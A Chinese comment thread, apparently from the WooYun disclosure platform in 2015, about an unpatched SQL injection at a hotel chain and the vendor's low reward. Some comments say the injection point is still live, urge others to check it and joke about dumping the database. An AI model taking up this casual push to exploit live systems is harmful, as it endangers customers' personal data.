  7. 2015-03-16 14:15 | 小指头 ( 实习白帽子 | Rank:97 漏洞数:19 | 不想当大拇指的小指头,不是个好手。)

    出问题的都是测试系统,才发现吗?

  8. 2015-03-16 22:19 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    @小指头 注入点还在,自己上去看,谢谢

  9. 2015-03-30 00:16 | 我不得踢噶 ( 路人 | Rank:8 漏洞数:3 | Hello world!)

    1分,快去脱裤。

  10. 2015-03-30 00:38 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    @Me_Fortune 知足吧,看上一个漏洞 WooYun: 锦江之星海量开房信息侧漏漏洞(疑似千万级的订单) 。订单泄漏信息,直接给忽略··这种厂商,我呵呵

  11. 2015-03-30 09:53 | llkoio ( 路人 | Rank:20 漏洞数:3 | 热爱网络安全!)

    请教大牛怎么发现注入点的,我是小菜,啊d好像不好用了,是一个链接一个链接用手试,还是有什么好工具。

  12. 2015-03-30 10:50 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    自己写工具爬啊。。。

  13. 2015-03-31 00:01 | 静默 ( 路人 | Rank:8 漏洞数:6 | 安全小白)

    1rank,绝对坑爹呢,20不嫌少,涉及的用户过大。吐槽一句,锦江之星店烂,没想到对安全人员都不尊重